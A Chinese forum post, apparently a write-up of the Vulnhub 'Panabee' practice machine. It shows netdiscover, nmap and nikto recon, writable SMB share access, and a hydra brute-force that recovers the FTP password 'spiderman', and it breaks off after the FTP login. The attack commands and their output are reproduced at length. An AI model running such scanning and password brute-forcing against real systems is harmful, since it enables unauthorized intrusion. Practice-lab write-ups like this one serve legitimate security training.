金牌会员
- 积分
- 1036
- 威望
- 0
- 金币
- 2502
- 贡献
- 0
- 注册时间
- 2022-7-17
- 最后登录
- 2022-7-17
|
人人为我,我为人人。登录后免费下载所有资源。
您需要 登录 才可以下载或查看,没有账号?立即注册
×
Panabee
识别目标主机IP地址
- (kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
- └─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
- Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
-
- 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
- _____________________________________________________________________________
- IP At MAC Address Count Len MAC Vendor / Hostname
- -----------------------------------------------------------------------------
- 192.168.56.1 0a:00:27:00:00:11 1 60 Unknown vendor
- 192.168.56.100 08:00:27:cd:98:c4 1 60 PCS Systemtechnik GmbH
- 192.168.56.228 08:00:27:2b:99:a3 1 60 PCS Systemtechnik GmbH
复制代码
利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.228
NMAP扫描
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
- └─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
- Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-22 23:21 EDT
- Nmap scan report for bogon (192.168.56.228)
- Host is up (0.00011s latency).
- Not shown: 65529 closed tcp ports (reset)
- PORT STATE SERVICE VERSION
- 21/tcp open ftp vsftpd 3.0.3
- 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
- | ssh-hostkey:
- | 3072 dc:e1:e6:86:ba:cd:4c:1c:e8:92:c4:02:90:64:d8:ba (RSA)
- | 256 00:72:c6:61:0e:34:1b:1a:b4:6c:f8:fc:b3:25:7b:6c (ECDSA)
- |_ 256 16:24:5b:97:20:ad:7d:ec:c4:fc:19:a5:3d:3c:cc:13 (ED25519)
- 25/tcp open smtp Postfix smtpd
- | ssl-cert: Subject: commonName=panabee
- | Subject Alternative Name: DNS:panabee
- | Not valid before: 2020-06-14T18:25:48
- |_Not valid after: 2030-06-12T18:25:48
- |_ssl-date: TLS randomness does not represent time
- |_smtp-commands: panabee, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
- 80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
- |_http-server-header: Apache/2.4.41 (Ubuntu)
- |_http-title: Apache2 Ubuntu Default Page: It works
- 139/tcp open netbios-ssn Samba smbd 4.6.2
- 445/tcp open netbios-ssn Samba smbd 4.6.2
- MAC Address: 08:00:27:2B:99:A3 (Oracle VirtualBox virtual NIC)
- Service Info: Host: panabee; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
- Host script results:
- |_clock-skew: 7h59m58s
- |_nbstat: NetBIOS name: PANABEE, NetBIOS user: unknown, NetBIOS MAC: unknown (unknown)
- | smb2-time:
- | date: 2023-03-23T11:21:52
- |_ start_date: N/A
- | smb2-security-mode:
- | 3.1.1:
- |_ Message signing enabled but not required
- Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
- Nmap done: 1 IP address (1 host up) scanned in 18.16 seconds
-
复制代码
获得Shell
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
- └─$ smbclient //192.168.56.228/note
- Password for [WORKGROUP\kali]:
- Try "help" to get a list of possible commands.
- smb: \ ls
- . D 0 Sun Jun 14 23:08:42 2020
- .. D 0 Mon Jun 15 04:59:44 2020
- note.txt N 265 Sun Jun 14 23:08:42 2020
- 20508240 blocks of size 1024. 12823536 blocks available
- smb: \ get note.txt
- getting file \note.txt of size 265 as note.txt (2.3 KiloBytes/sec) (average 2.3 KiloBytes/sec)
- smb: \ put test.txt
- putting file test.txt as \test.txt (2.3 kb/s) (average 2.3 kb/s)
- smb: \ ls -alh
- NT_STATUS_NO_SUCH_FILE listing \-alh
- smb: \ ls
- . D 0 Thu Mar 23 07:23:20 2023
- .. D 0 Mon Jun 15 04:59:44 2020
- test.txt A 12 Thu Mar 23 07:23:20 2023
- note.txt N 265 Sun Jun 14 23:08:42 2020
- 20508240 blocks of size 1024. 12823528 blocks available
复制代码
可以通过SMB上传文件
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
- └─$ cat note.txt
- Dear goper,
- I'll just leave it here as a note,
- Sorry for the late response,
- The server will now `backup` you files in your home dir,
- go ahead and backup anything you like, server will do it for you.
- Please delete this note once you've read for security measure
复制代码
[ol]
goper是用户名?
有计划任务在执行?(定期备份文件)
[/ol]
- ┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
- └─$ nikto -h http://192.168.56.228
- - Nikto v2.1.6
- ---------------------------------------------------------------------------
- + Target IP: 192.168.56.228
- + Target Hostname: 192.168.56.228
- + Target Port: 80
- + Start Time: 2023-03-22 23:25:23 (GMT-4)
- ---------------------------------------------------------------------------
- + Server: Apache/2.4.41 (Ubuntu)
- + The anti-clickjacking X-Frame-Options header is not present.
- + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
- + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
- + No CGI Directories found (use '-C all' to force check all possible dirs)
- + Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5a81bc478475f, mtime: gzip
- + Allowed HTTP Methods: HEAD, GET, POST, OPTIONS
- + 7915 requests: 0 error(s) and 5 item(s) reported on remote host
- + End Time: 2023-03-22 23:25:52 (GMT-4) (29 seconds)
- ---------------------------------------------------------------------------
- + 1 host(s) tested
- *********************************************************************
- Portions of the server's headers (Apache/2.4.41) are not in
- the Nikto 2.1.6 database or are newer than the known string. Would you like
- to submit this information (*no server specific data*) to CIRT.net
- for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
复制代码
目录扫描没有什么收获,接下来用hydra来破解密码
- ──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
- └─$ hydra -l goper -P /usr/share/wordlists/rockyou.txt ftp://192.168.56.228
- Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
- Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-03-22 23:38:08
- [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
- [DATA] attacking ftp://192.168.56.228:21/
- [21][ftp] host: 192.168.56.228 login: goper password: spiderman
- 1 of 1 target successfully completed, 1 valid password found
- Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-03-22 23:39:08
复制代码
[code]┌──(kali㉿kali)-[~/Desktop/Vulnhub/Panabee]
└─$ ftp 192.168.56.228
Connected to 192.168.56.228.
220 (vsFTPd 3.0.3)
Name (192.168.56.228:kali): goper
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp ls -alh
229 Entering Extended Passive Mode ( |
|